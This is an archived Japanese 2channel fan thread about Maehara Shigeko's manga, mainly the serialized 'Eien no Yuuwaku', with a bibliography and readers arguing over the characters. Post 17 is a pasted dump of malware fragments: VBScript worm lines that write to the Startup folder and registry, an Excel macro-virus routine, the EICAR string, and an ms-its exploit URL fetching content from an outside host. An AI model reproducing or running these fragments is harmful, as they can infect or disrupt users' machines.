2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【2007年こそ完結?】前原滋子・6【永遠の誘惑】

1 :花と名無しさん:2006/12/29(金) 01:58:39 ID:17peQnqt0
休載が多くても、絵やストーリーが褪せてゆくばかりでも、
完結を見届けたくなる「永遠の誘惑」――連載開始から8年10ヶ月。
凪子・睦月・マリエの動きにイライラしてる人も、如月の幸福を願う人も、
マターリと語りましょう。

その他、前原滋子作品に関することなら何でもOK。
過去スレと関連スレ・サイトは>>2、作品案内は>>3-10辺りを参照。

短命に終わった前スレ  2006/12/06〜12/10
【来年は完結?】前原滋子・5【永遠の誘惑】
http://comic6.2ch.net/test/read.cgi/gcomic/1165410753/

2 :花と名無しさん:2006/12/29(金) 01:59:04 ID:???0
◆過去スレ
・前原滋子さんって知ってますかー  2000/09/22〜
  http://piza.2ch.net/gcomic/kako/969/969588282.html
・前原滋子  2001/03/02〜
  http://salad.2ch.net/gcomic/kako/983/983530959.html
・前原滋子 「永遠の誘惑」  2002/07/31〜
 http://comic.2ch.net/gcomic/kako/1028/10280/1028041821.html
・前原滋子  2004/04/28〜
 http://comic6.2ch.net/test/read.cgi/gcomic/1083138330/
 (http://yukiyuki.united.net.kg/ch/oldlog/m2/maehara_log0509.html にログあり)
・【来年は完結?】前原滋子・4【永遠の誘惑】  2005/09/03〜
 http://comic6.2ch.net/test/read.cgi/gcomic/1125731456/

◆関連スレ
・【ビーラブ】BE-LOVE(2)【続編てんこもり】
 http://comic6.2ch.net/test/read.cgi/gcomic/1125728467/
・【早売りゲッター】総合スレ・十五冊目【ネタバレ】
 http://comic6.2ch.net/test/read.cgi/gcomic/1166260791/

◆関連サイト
・BE-LOVE公式
 ttp://be-love.net/
・前原滋子ライブラリー
 ttp://uk.geocities.com/maehara_shigeko/
・旧作を含むコミックス通販
 ttp://www.amazon.co.jp/ >本>詳細サーチへ
 ttp://furima.rakuten.co.jp/ >古本>まんが→検索

3 :花と名無しさん:2006/12/29(金) 01:59:37 ID:???0
■…単行本タイトル ▲…同時収録作品

1974
■「恋のA級ライセンス」
高校三年で男の子たちの憧れの的、チェリーナは、なぜか男嫌い。
自動車部のエース、バギーと、新入部員エディーが、チェリーナを争い、高校ラリーの対抗戦が白熱。
 ▲「花のアメリカピンク学園」
親の転勤でアメリカ移住、男生徒はすべて女生徒に絶対服従という共学高校に転校した、洋太郎。
学校を仕切る女生徒会長リンダに、洋太郎は対決を挑む。

1974
■「ミスター東はOhショック!」
高校一年の東(あずま)と真美は、学校で一番の美男美女として有名なカップル。
東のアパートの隣の部屋に、医者の卵の男の子、栄が引っ越してきて、東にひと目惚れ、
 ▲「華麗にアタックみじめくん」
高校一年の男の子、三条岬(みさき)の住むアパートへ遊びに行った夢美の前に、外人の訪問客登場。
ブラジルで成功して他界した叔母から岬に、百億円の遺産が遺されたというのだ。
 ▲「かれのお値段20万」
大学一年の笹本徹は、街で妙な看板を持って一日二万円の求人募集をする女の子、篠原夕子に出会う。
徹の仕事は、十日間のあいだ徹と夕子が富豪の夫婦のふりをすることだった。
 ▲「さよなら他人の関係」
大学生の女の子、夕美(ゆうみ)は、恋人の秀樹と共に同棲カップルのコンテストに応募。
実際には同棲も何もしていないのだが、秀樹の借金五万円の返済であてがなく、賞金が五万円なのだ。
 ▲「青春のプレリュード」
高校に入学する前から双葉満(みつる)は、香澄(かすみ)に片思い。
同じクラスになり、満は、自己紹介で、香澄への好意と交際申し込みを宣言する。

4 :花と名無しさん:2006/12/29(金) 02:00:17 ID:???0
1975
■「ビバ!恋愛天国」
高校でボクシング部の男の子ロッキーの家の隣に、幼なじみだった女の子、チェスが戻ってきた。
チェスは小学校からずっと男子禁制のお固い女学院の寮生活、男性には全く興味がない。
 ▲「ハローレディ」
ニューヨークから北国の田舎町へ引っ越してきた。おしゃれな高校生の女の子、リビアン。
高校のスケート部の人気者ラリーと、その弟のリッキーが、リビアンを挟んでライバルになる。

1975
■「青春に翼を!」
弁護士志望だが経済的に余裕のない大学生、良は、複雑な家庭環境で暮す杏子と両思いになる。
良は、大学の教授から学費援助の話を持ちかけられるが、令嬢佐保子との婚約が条件だった。
 ▲「鈴蘭の花かおる」
高校三年で弓道部の譲(ゆずる)と、一年の女の子、礼文(れぶん)は、お互いに惹かれてゆくが、
譲にも礼文にも家族や親戚の都合による結婚話が持ち上がる。
 ▲「シャックリこっくりゴールイン」
魅力子(みりこ)、大きい子(たいこ)、千万城(ちまき)の三人は、高校一年になったばかり。
男の子をからかう三人を大声で怒鳴りつけた男の子、悟(さとる)に、千万城がひと目惚れ。
千万城は『実践恋愛講座』という本を買ってきて、努力を重ねてゆくが……。
 ▲「17さいのはばたき」
三恵と史郎は同じ高校に通う幼なじみ。勉強も運動も超苦手な三恵を、何かとかばっていく史郎。
そのため三恵は、史郎に片思いする同級生の女の子たちには、いつも目障りな存在だった。

1975
■「十代の青春」
高校三年の春。ラグビー部の正人に片思いの女の子、歩(あゆみ)に、秀才の岩淵計も片思い。
 ▲「ハート貸します」
高校生の女の子、ミルキー、アップル、コーラは、『ハート貸します』というアルバイトの会を結成。
ガールフレンドが居なくて淋しい思いをしてる男の子に、一日有料でデートしてあげるという会だ。
 ▲「ふたごっ子ハネムーン」
大学一年の双子姉妹の姉、枝織は、同じ大学の一郎と学生結婚する前の晩にアクシデントがあり、
急きょ、式場だけの代理花嫁として、双子の妹の沙織が出ることになった。

5 :花と名無しさん:2006/12/29(金) 02:00:51 ID:???0
1976
■「初恋教室」
子供の頃から男まさりな女の子、アンジーが高校生になってビーナス・コンテストに出場させられる。
ショーンやアイドルと名乗る男の子が恋人に立候補し、アンジーも恋する気持ちにめざめてゆくが、
アイドルの意外な秘密が明らかになり、アンジーの初めての恋には強敵のライバルが現われる。
 ▲「新婚ってなんの味?」
幼なじみの正四郎と優雅(ゆうが)は高校三年で結婚。優雅は独断で正四郎の通う高校へ転校する。
正四郎と一緒の高校生活も知りたかった優雅。しかし校則は学生結婚禁止で、他人のふりを始める。

1977
■「初恋のかくれんぼ」(「初恋のかくれんぼ」「恋はブランコ」「恋のあやとり」)
幼なじみの杏(あんず)と影(えい)は、家が隣同士で、同い年の一人っ子同士。
ふたりは同じ中学校に進むが、才媛のさやかが影に接近。三輪好和が杏に手紙で告白。
 ▲「恋の協力接着剤」 
高校で一番ナイスな男の子、エースが誰にもなびいてくれないので、女の子たちが一計を案じる。
男まさりの女の子エイブルを、エースに近づけて、自分達の女らしい魅力に気づいてもらう計画だ。
 ▲「キスはトイレの中で」
全寮制の共学校の男子寮と女子寮に分かれる廊下の角は、通称『お見合いの場』。
ウブな女の子、美々がぶつかった相手は、プレイボーイで有名な男子、南条理加(リカ)だった。

1980
■「杏&影 恋人時代」
「初恋のかくれんぼ」続編。 幼なじみの杏と影の高校時代前半。影の家で、年の離れた妹、真帆が誕生。
杏は、影とは別の女子高に進んで淋しくなるが、彰は、親友の保科を杏に紹介する。

6 :花と名無しさん:2006/12/29(金) 02:01:26 ID:???0
1978
■「学生街のラブサウンド」
 ▲「恋まつり」
大学生の女の子、夕鶴(ゆづる)ことツルのアパートの空室にボーイフレンド周一が引っ越してきた。
 ▲「水色の風 大学通り」
学生街のバス停で、大学四年の女の子、生(うぶみ)は、臣(おみ)こと正臣に交際を申込まれる。
 ▲「うしろの空席だぁ〜れ!」
W大学一年の女の子、悠矢はT大生の一郎と交際を始めるが、気になるのはT大志望の一浪生、年也。
 ▲「はつこい散歩道」 
高校生の星子は、片思いしている男の子、唯(ゆい)の友人、直人から、交際を申込まれた。

1978
■「そこにあなたがいるから」 
中学の入学式で、一子(いちこ)は、同級生の男の子、命(みこと)に心を惹かれる。
やがて、命も、卓球部の仲間、和穂も、一子も、同じ高校へ進学。
一子の思いが通じる日がやってきたが、和穂もまた、中学時代からずっと一子に思いを寄せていた。
 ▲「テレフォンデートは混線中」
高校一年の女の子、海里(かいり)は、電話の混線で、西崎基(もとい)と知りあうが
基の兄の満を、基だと勘違いしてしまう。

1979
■「きみ色の日々」
高校で陸上部の特待生、渡瀬幹(みき)に、陸上部マネージャーの新名(にいな)が告白。
新名の気持ちが通じて交際が始るが、体調を崩したときの無理がたたって幹は陸上を引退、退学。
新名の前からも去っていったが、一年後に、アイドル歌手としてデビューする。

1981
■「続・きみ色の日々」
アイドル歌手からシンガーソングライターへの転身を考える幹と、大学生になった新名が再会。
新名は、二人の住む世界の大きな隔たりを感じ、幹が普通の大学生に戻ることを願うようになる。
幹にあこがれてアイドル歌手になった、結花(ゆうか)が登場。

7 :花と名無しさん:2006/12/29(金) 02:01:58 ID:???0
1979
■「綴り箱のかたすみに」
高校一年の窓花は、同級生の一樹に魅かれていたが、一樹の転校で、片思いのまま失恋。
月日が流れ、窓花は東京で同じ大学の学生同士として再び一樹と出会うが、一樹には恋人がいた。
 ▲「それはあんまり 好ちゃん」
高校三年の男の子、大葉圭(けい)のクラスに、臨時担任で謎の女教師、星崎好(このみ)が来る。
 ▲「やっぱり気になる好ちゃん」
両親がいなくて結婚願望の強い好は、積極的に二人の結婚を進めたがり、圭はまた振り回されてゆく。

1980
■「たとえば彼とわたし」
高校三年でテニス部の琴美と瑠璃に、芹(せり)と比呂樹(ヒロ)が、グループ交際を申込んできた。
志望大学が同じ芹と琴美は友情を謳歌し、瑠璃は芹への、ヒロは琴美への片恋を胸に秘めている。
 ▲「花の大学のまんなかで」
大学一年の女の子、極(きわみ)は、高校時代からの先輩で大学三年の、未明(みめい)と再会。
高校時代に極と文通していた親友の若子は、未明への片思いがいつも書かれていた手紙を思いだす。
 ▲「恋歌3・3・7拍子!」
高校生になった麻美は、入学式で見た応援団団長の三年生、新沼団(だん)にあこがれ応援団に入部。

1981
■「風のメモワール」
高校一年の里美、親友の真砂、里美のあこがれのクラス委員の永瀬裕は、バスケ部。
転校生の橘省吾が、ぬるま湯の高校生活に波紋を投げ掛けてゆく。
 ▲「雪の道標」
東京在住で大学一年の夏彦は、夏の北海道旅行で、知床岬に住む18歳の純子と恋に落ちる。

8 :花と名無しさん:2006/12/29(金) 02:02:36 ID:???0
1981
■「結&旅人」
中学の入学式で、結(ゆい)は、旅人(たびと)と出会って親しくなるが、
結の親友、公子の告白を、結だと勘違いした旅人がOKしてしまう。
 ▲「波のかなたに」
中学三年で水泳部の女の子、広海(ひろみ)と、水泳部の男の子、水帆(みずほ)の物語。
水帆とは別の高校に進む広海は、卒業記念の寄せ書きをする色紙に、忘れな草の絵を描く。

1983
■「ジーンズの杜から」
一浪してあこがれのW大に入学した芹子と舵(かじ)が親しくなる。
内気で人見知りな芹子は、同じアパートに住むW大の先輩、篠原に淡い片思い。

1984
■「その日がくるといいね」
高校三年生の和哉と柚に赤ちゃんができて結婚、柚は高校をやめて和哉の家に同居する。

1984ー1994
■杏&影 結婚日記(1)(2)(3)(4)(5)(6)
両親が仕事の都合でアメリカに移住した杏は、彰の家族と暮すようになって半年。
二人は、高三で結婚するが大学生活を共に過ごしたいと考え、
揃って合格した後は、東京のアパートで同じ大学に通う生活が始まる。
男の子・新(あらた)と女の子・緑(みどり)という双子を育てながら大学に通い、
影が就職し少女漫画雑誌の編集者になった後、さらに新たな双子、小紅と葉子が加わる。

9 :花と名無しさん:2006/12/29(金) 02:03:12 ID:???0
1983ー1986
■「BGMはいらない」(1)(2)(3)(4)(5)             
高校生の真凛(マリン)は同学年の永遠(トワ)と恋人同士。
あるとき大学祭に出かけた真凛は、永遠の兄、四季(シキ)と出合い、両思いになってゆく。

1988
■「ぼくの方が愛してる(新BGMはいらない)」(1)(2)
四季がいなくなり、渡瀬幹の相手役で芸能界デビューした真凛を守りたくて、芸能界入りした永遠。
四季の残した小説の映画化で真凛と永遠の共演が決まるが、永遠は四季の存在感の大きさに悩む。

1990
■「そばにおいでよ」(1)
高校女教師一年目の乃里子23歳と、教え子で高校三年生の雅弘18歳の恋。雅弘の元彼女、舞が登場。
 ▲「雨に抱かれて」
大学三年の麻子の恋人・柊平に、高校生の少女・理沙がつきまとうようになり、麻子を追いつめていく。

1991
■「そばにおいでよ」(2)
高校女教師の乃里子24歳〜25歳と、大学生になった雅弘19歳〜22歳の恋。
雅弘のサークル仲間で女子学生の菜摘、乃里子の初恋の中学の先輩でTV局勤務の雨帖が登場。
 ▲「僕と君が出会ってしまったこと」
少女小説雑誌の編集者、日南子の担当は、高校生デビューだった男性の少女小説家、碓井柊生。
柊生は、日南子と同じ高校出身で、日南子にとっては当時からいちばん嫌いなタイプだった。

1993
■「そばにおいでよ」(3)
高校女教師の乃里子28歳と、旅行代理店に就職した雅弘23歳の恋。
乃里子と大学で同期だった友人、英子が、ハネムーンツアーで成田離婚した後、雅弘にアタック。
 ▲「君に逢えてよかった」
高級住宅街の豪邸で家政婦のバイトをする大学一年の美奈が、
邸宅の最寄り駅の駅前のケンタッキーの常連で名前も知らない男に片思い。

10 :花と名無しさん:2006/12/29(金) 02:07:15 ID:???0
1991
■「シャワーのあとで」(1)(2)
映画監督の父と大女優の母を持つ、18歳のアイドル歌手、夏姫(なつき)やすみ。
やすみはマネージャーの聰(そう)に片思い。しかし、聰には恋人の由希子がいて婚約中。

1996
■「恋愛前夜―恋人たちの初めての夜」
 第1話「スイートピー」
二年前行きずりでベッドに誘った女の子を忘れられない高校教師、銀河(弟の名は流星)。
銀河に片思いしている女生徒、亜里子(ありす)は、だんだん挑発的になってゆく。
 第2話「タンポポ」
不動産会社のOLで26歳の丹羽倫子が、同僚の真鍋龍一と不器用な恋をする。
 第3話「かすみ草」
女子大生かすみは、親友の薔子の恋人である流星に片思い中で、やがて三角関係になってしまう。

1997
■「だから言ったじゃないの」
 ▲「だから言ったじゃないの」
両親がきびしかったため、男友達も出来なかった美苗(みなえ)は、29歳で見合い結婚。
 ▲「マンションを買いたい女」
29歳で結婚した、うらら。夫がローンを嫌いアパート生活のままなので離婚を考えている。
 ▲「計画的バツイチへの結婚のススメ」
結婚はしたくないが子供は欲しいので出産適齢期が心配な翡翠(ひすい)、29歳。

1999(1)〜(4) 2002(5)(6) 2004(7) 2005(8) 2006(9)(10)
■「永遠の誘惑」(1)〜(10) ※続刊未定、BE-LOVEにて連載中
36歳になり大人の恋に疲れた独身の女医、凪子は、如月と名乗る少年と出会い、恋人同士になる。
約三ヶ月後、凪子は、高校の同窓会を機に、旧友の木綿子、睦月と真梨絵の夫婦に再会。
凪子には初恋の相手だった男、睦月の長男が、如月だった。

11 :花と名無しさん:2006/12/29(金) 02:09:58 ID:???0
テンプレは以上です。
前スレがあっという間にdat落ちしてしまったので、一部のレスを以下にコピペ。
======================
14 名前:花と名無しさん 投稿日:2006/12/09(土) 19:07:56 ID:???O
作者の息子、結婚とかしたかね?
連載長さすぎて、環境やら変わるよね。
----------------------
15 名前:花と名無しさん 投稿日:2006/12/10(日) 08:46:26 ID:???O
絵崩れないうちに終了して欲しかった
----------------------
16 名前:花と名無しさん 投稿日:2006/12/10(日) 22:29:23 ID:???0
「今度はその子を私にちょうだい」に篭められた凪子の真意を想像してみた。

1マリエへの復讐
・大きな打撃を与えることが出来る

2如月との今後
A立ち聞きしているであろう如月にこの台詞を聞かせることで、彼がショックを
 受けて自分と別れる気になるよう仕向けた
B大打撃を受けたマリエから「お願いされて」如月と別れる、という展開に持ち
 込むことにより、彼女に貸しを作る作戦

3事故との関連性
・一度死にかけたことで、凪子の心境に何らかの変化があった

1は間違いなくあると思う。2は少女漫画のヒロインとしてはAだろうけど、
黒凪子化していたらBもあり得る。とはいえ、3も含めて考えればAかなぁ。
自分の命を救ってくれた睦月への感謝の気持ちは凪子も持っているだろう
から、これ以上マリエを追い詰めるようなことはしない気がする。

12 :花と名無しさん:2006/12/29(金) 02:13:31 ID:???0
今発売中のBE-LOVE 2号に最新話が載っています。
次は2月1日発売の号に載る予定らしいので、それまでこのスレを
維持出来るよう、保守を兼ねた書き込みをよろしくお願いします。

13 :花と名無しさん:2006/12/29(金) 03:03:10 ID:???O
>>1さん乙です
今度は落ちませんように

14 :花と名無しさん:2006/12/29(金) 07:01:13 ID:NBnVZueuO
凪子は如月とマリエの為に別れる決心をする。
睦月とマリエ夫婦の心の溝。 マリエは睦月に今の自分の気持ちを怒るように伝え、最後に、自分が別の人に抱かれた為に、離婚したいと告げる。

15 :花と名無しさん:2006/12/29(金) 08:12:26 ID:???0
やっぱり落ちてしまっていたんですね
>>1さん乙です
最新号読んで思ったんですけど
凪子にもマリエにも共感できるというか、、、
(元々、凪子の方が好きでしたが)

さて、睦月がどう出てくるかですね

16 :花と名無しさん:2006/12/29(金) 13:49:47 ID:???O
即死防止
誰にも共感できなくなりつつも最後まで見届けますとも

17 :<body onload=window()>:2006/12/29(金) 14:26:08 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

18 :花と名無しさん:2006/12/30(土) 01:22:55 ID:???O
保守ageしておきます

19 :花と名無しさん:2006/12/30(土) 01:38:05 ID:???0
即死防止を兼ねて、今号の感想をつらつらと。

凪子が格好良かったなぁと思いつつ、母親マンセーな描き方には激しく違和感。
一度死にかけたことで、命の大切さや周りの人間によって生かされていることを
改めて感じ、命を育むことがどれだけ大変かに想いを馳せた・・・的な流れの中で
凪子の心境の変化が語られるなら良かった。

なのに、母親になったマリエは偉い!自分の命より子どもが大切なんて凄い!
みたいに描き方になってしまったから、子どもを食い殺しかねないほど一体化
している母親にどこが・・・?と引いてしまった。

20 :花と名無しさん:2006/12/30(土) 02:20:38 ID:???0
マリエは、人生最初の最大の試練ですね
どうなるんでしょうか

21 :花と名無しさん:2006/12/30(土) 14:12:03 ID:???0
>>20
普通になんだかんだあっても、マリエ睦月離婚なし如月とも和解だけが頭に浮かぶんだが・・・
つくづく凪子は運の悪い女だよな。性格的なもんもあるかもしれんが

22 :花と名無しさん:2006/12/31(日) 00:51:06 ID:???0
マリエはお馬鹿だなぁと思うのは、現実が全然見えていないこと。
彼女は凪子を「頭が良い女性であり、私を見下している」と思い込んでいる。

でも凪子は、ヤケになって他の男に身を任せたりそれを睦月に見せつけたり、
挙句の果てに中絶してしまうような愚かさも持ち合わせてるし、本人も自分の
愚かさを自覚している。マリエは幻の凪子を見ているだけなんだよね。

しかも、如月はマリエの分身ではなく独立した人格だし、睦月と凪子の間も
彼女が想像しているものとは違う。
現実にきちんと目を向け、それに対処していけるようにならない限り、マリエに
幸せは訪れないと思う。

23 :花と名無しさん:2006/12/31(日) 02:13:09 ID:???0
これを読んで、マリエって宗教にハマリそうだよなーと思った
http://life8.2ch.net/test/read.cgi/live/1151324647/224

24 :花と名無しさん:2006/12/31(日) 16:36:52 ID:???0
学生時代を読んでいた時は、凪子の立場で入り込んで、マリエを嫌悪していたのに
現代版ではいつの間にかマリエ寄りになっている自分に気付いた。
自分が母親だからなのかな。
凪子が非常識だと思うし、マリエの感情は当たり前だとしか思えない。
ずっとフルタイムで働いてきたから、マリエみたいに優雅な主婦じゃないけど。
前回で思ったんだけど、
付き合ってるからって、高校生に自宅の合鍵を渡すかな〜。
聡明な大人の女がする事じゃない。
これも現実が見えなくなっている女なんだと思う。

25 :花と名無しさん:2007/01/01(月) 02:20:17 ID:???O
マリエは睦月に見せつけようと他の男性と寝た事も中絶した事も知らないんだし、凪子は普段は冷静なしっかり者だから愚かな事は気付かないよ。凪子も怖いタイプ。マリエの婚約者になった後から激しく睦月に想いをぶつけたり、如月と付き合ったり >マリエに態度を変えず

26 : 【末吉】 【55円】 :2007/01/01(月) 09:22:43 ID:???O
月一確実に連載されますように

27 :花と名無しさん:2007/01/01(月) 22:01:31 ID:???0
マリエの気持ち悪さって、如月と(一方的に)一体化してしまっている
ところにあると思う。
それが無ければ、息子の恋人が自分と同じ歳なんてショックだろうな、
しかもそれが昔の恋敵だなんて気の毒・・・と自然に受け止められるのに。

けどマリエときたら、睦月とうまくいってない空白を如月によって
埋めようとしているものだから、妙に生臭くて引いてしまう。
アテクシの最高の恋人になれる男を育てたのに、他の女に取られる
なんてムキー!!!としか見えないんだもの。
私が如月の立場だったら、間違いなく家庭内暴力に走ってるよ。

28 :花と名無しさん:2007/01/02(火) 01:05:08 ID:???0
こんなマイナースレにまでウイルスコード貼りやがって・・・!

29 :花と名無しさん:2007/01/03(水) 21:44:03 ID:???0
マリエは、母親としてはごく普通だと思う。
というか、子供べったりではなく、どちらかというと
子供より睦月や自分の事の方が第一というタイプじゃない?
毎週外泊する高校生の息子を心配しながらも放任していたし、
直接如月に発する言葉は、普通の母親のこごとであり、
「ぼくちゃん命」的なことは言っていない。
子供は宝物って、仕事でキャリアを積んできた凪子に対して、
自分が誇れるものとして、負け惜しみ的に言ったことだと思う。
木綿子も言っていたように、これは母親なら誰だって
当たり前に持っている母性本能。
ここって、マリエ擁護すると叩かれそうだけど・・。

マリエの気持ち悪さって、わたし的には
いつまでも女として睦月の愛を求め続けるところ。
そこが哀れで悲しい。


30 :花と名無しさん:2007/01/06(土) 10:18:05 ID:???0
保守

31 :どうしちゃったのナッキ-:2007/01/06(土) 22:46:46 ID:???0
次回予測
凪子が如月の子供を妊娠。


32 :花と名無しさん:2007/01/06(土) 22:48:08 ID:???0
ネームまちがえちゃったよ

33 :花と名無しさん:2007/01/07(日) 23:58:14 ID:???0
>29
でも、それは独身の凪子と再会した事で噴出した事のような気もする。
凪子が結婚していたら、意外と普通に仲良くなった気がする>凪子とマリエ
少なくとも、凪子もマリエも二十歳の時の決着に当時はそれぞれ納得して
いたんだから。当時の凪子は、まさか十数年後も睦月への思いをくすぶり続けて
独身でいるなんて思わなかったんだろうな。
睦月に固執→他の男では納得できない→恋人が出来ない→睦月や思い出を美化してますます固執の
悪循環に嵌ってしまったような・・・。大学時代の妊娠した相手と結婚していたら、
結構幸せになれていたと思う。あてつけにしても、それなりに選んだ相手だと思うから。
1番好きで手に入らない睦月に固執していたから、恋愛対象になりきらなかっただけで。

そしてマリエも凪子が結婚していたら、睦月に対する女としての愛情に固執しなかったように思う。
少なくとも、凪子に再会するまではそうだったのではないかと思う。

34 :花と名無しさん:2007/01/08(月) 16:11:31 ID:???0


35 :なぎ:2007/01/10(水) 13:37:35 ID:u0gG4SwK0
まりえはきらいどうして自分が選ばれたか教えてやりたい.凪子に睦月か如月と幸せになってもらいたい


36 :花と名無しさん:2007/01/10(水) 23:56:55 ID:???0
凪子はきらい。
どうして自分が選ばれなかったのか教えてあげたい。
自分がマリエ妊娠のため身を引いたからと本気で信じてるけど、
睦月は妊娠を知る前にマリエの大切さに気付いて決意したはず。
木綿子に会う前に、二人の思い出を思い巡らしている見開きのページがある。




37 :花と名無しさん:2007/01/11(木) 07:18:21 ID:???0
>>36 ちゃうやろ!よく読めや

38 :花と名無しさん:2007/01/11(木) 10:00:43 ID:???0
>>36
てゆーか、睦月は凪子のことが好きだったけど、マリエのことも嫌いではなかったから、
新城父から、マリエが自分から婚約解消を言い出してきたと聞かされ、自責の念もあり
いろいろ思い巡らしていたというところじゃないかな。
でも、その時点でマリエの大切さに気づいて(結婚を)決意したわけではなく、
木綿子からマリエの妊娠を聞かされて、自分がその前に決心していたこと(凪子の
部屋へ行き、自分の気持ちを伝えること)は、もう不可能なことなのだと悟ったのだと思う。

39 :花と名無しさん:2007/01/11(木) 11:57:37 ID:???O
マリエとは子供できて仕方なく結婚したんだね

40 :花と名無しさん:2007/01/11(木) 12:12:17 ID:???0
どう読むかで、読むやつの人間性が出るね。

41 :花と名無しさん:2007/01/11(木) 16:34:42 ID:???0
>>36はかなり読みが深いと思う。
その場合かなり作品に奥行きが出てくる。
明らかに昼ドラとは違う設定。
睦月とマリエ、
子供ができて仕方なく結婚…と読者に思わせておいて、
じつは…なんて、この作者ならやりそうだ。


42 :花と名無しさん:2007/01/11(木) 17:45:32 ID:???0
>>39 別に「仕方なく」ではないと思うけど・・・

43 :花と名無しさん:2007/01/12(金) 00:17:23 ID:???0
私が徹底的に凪子が嫌いになった場面、
睦月に如月との事を知られて、自分と寝れば別れてあげると交換条件を出し
その気満々で行ったくせに、睦月の
「寝たら凪子がただの女になってしまう」なんて言葉で一転。
自分もそのつもりだった的状況に話をもっていく。いい女を気どって。
5分だけ抱きしめて、なんちゃって・・。
そしてその日は、振られた男の息子に平気で抱かれる。
「何も無かった。」と言って・・。
この状況は何も無かったと言えるのか?
はっきり言えばいいじゃん。
「お父さんは抱いてくれなかったから、5分抱きしめてもらった。」
言えないよね。
セックスするよりも遥かに淫らだもの。
これが、作者のこの作品の主題としているらしい、体の結びつきよりも
深い愛、というものであるのなら、作品として浅い。
ナンセンスだ。

44 :花と名無しさん:2007/01/12(金) 11:41:55 ID:???O
禿同

45 :渚 水帆(作家&阪大のアイドル):2007/01/12(金) 12:15:03 ID:qh9ud9Um0
4496.犬のおまわりさん♪ 返信 引用

名前:渚 水帆 日付:1月12日(金) 12時3分
岸和田の商店街で見かけた、
犬のおまわりさん♪

↓かわいいですね!(*^^*)
http://hp.jpdo.com/cgi33/243/joyful.cgi?



46 :花と名無しさん:2007/01/12(金) 13:34:31 ID:???0
>>43


>どう読むかで、読むやつの人間性が出るね。

47 :43:2007/01/13(土) 09:13:40 ID:???0
>>46
凪子派はどう読んだのか、反論を楽しみにしていたんですが。

48 :花と名無しさん:2007/01/15(月) 19:06:37 ID:???0
保守あげ

49 :花と名無しさん:2007/01/16(火) 13:10:07 ID:???O
マリエ派はどう読んでんの?

50 :花と名無しさん:2007/01/16(火) 14:38:05 ID:???0
>>43
読んでるだけで気分悪くなる。低レベルすぎ・・・
釣られない住人に質の高さを感じて安心した。


51 :花と名無しさん:2007/01/16(火) 20:34:50 ID:???0
>>50
作品についての反論は何も述べずに
ただ書き込み者の人間性とか低レベルとか、
すごい自信ですね。
人間性豊かで高レベルな凪子派の意見を是非聞かせてください。
誰かへの攻撃じゃなくて、作品や登場人物への思いを。
43は作品についての単なる個人的感想ですよ。
それが出来ないのならば、無視していればいいのではないですか。
他の質の高い皆様のように・・。
そして別の高レベルな話題を振ってください。

「ただの女になりたかった・・。」
睦月にそう言えばよかったと思う。



52 :花と名無しさん:2007/01/17(水) 00:33:08 ID:???0
煩いよ

53 :花と名無しさん:2007/01/18(木) 08:37:26 ID:???O
木綿子派いるの?

54 :花と名無しさん:2007/01/18(木) 23:25:33 ID:???O
いない

55 :花と名無しさん:2007/01/19(金) 00:45:00 ID:???O
木綿子、完全にど〜でもいい脇役。いなくても良かったんじゃない?

56 :花と名無しさん:2007/01/19(金) 01:00:25 ID:???0
一人で遊んでろ

57 :花と名無しさん:2007/01/20(土) 14:14:57 ID:???O
木綿子人気ないね

58 :花と名無しさん:2007/01/20(土) 15:14:29 ID:???0
あと7話を残すだけなわけだが、木綿子と沢木先生の関係は
どうまとめるつもりなんだろう?
付き合ってはいるみたいだけど、離婚歴あることも娘の存在も
話していない。バレちゃうまで付き合えればいいなんて言いつつ
どんどんラストに近づいてきてるし、今は凪子と如月の関係が
マリエにバレてクライマックスに突入してしまったものだから、
その収拾に追われているしね。
そういえば、マリエは知ってるけど、大学卒業後マリエに
会わなかった間もずっと近い存在だった凪子には話していないよね、
沢木先生のこと。

59 :花と名無しさん:2007/01/21(日) 15:13:19 ID:???O
沢木先生が事実知っても木綿子と付き合いそう

60 :花と名無しさん:2007/01/21(日) 16:23:00 ID:???0
つーか、離婚したことや子供がいる事実は、付き合う相手に対して
そんなに頑なに秘密にしなきゃならないことなの?

61 :花と名無しさん:2007/01/21(日) 19:11:57 ID:???O
実は…って打ち明けたら
知ってます。
ってオチな気がする

62 :花と名無しさん:2007/01/21(日) 22:47:41 ID:gmpMk/w30
>>61
同意〜
コミックスの最初の方(巻数は失念)で、
4月の新学期に、小学校の教室で、
木綿子が、クラス担任することになった児童達の前で、
結婚歴があること=離婚経験を自らばらしていた。
ってことは、
同僚の先生方にも、周知の事実じゃないのかなあ。
(前夫との子どもと暮らしているって事も)。
そういう家庭環境って、
仮に木綿子が校長や親しい先生くらいにしか打ち明けてないとしても、
口づてに伝わるでしょう。

63 :花と名無しさん:2007/01/22(月) 01:10:54 ID:???0
作者がそのエピ>>62を覚えているか否かはともかくとして。

>>60
> つーか、離婚したことや子供がいる事実は、付き合う相手に対して
> そんなに頑なに秘密にしなきゃならないことなの?

ケースバイケース。
本気で将来をともにするつもりなら、早いうちに打ち明けたくなるかもしれないし、
それほど本気じゃなければ、自分のハンデはわざわざ見せたりしないかも。

木綿子の場合は、10年も年上で子持ちのバツイチだから破局になってもいい、
ってつもりでいるようだけど、
別れた後も同僚でいるのがつらくても、
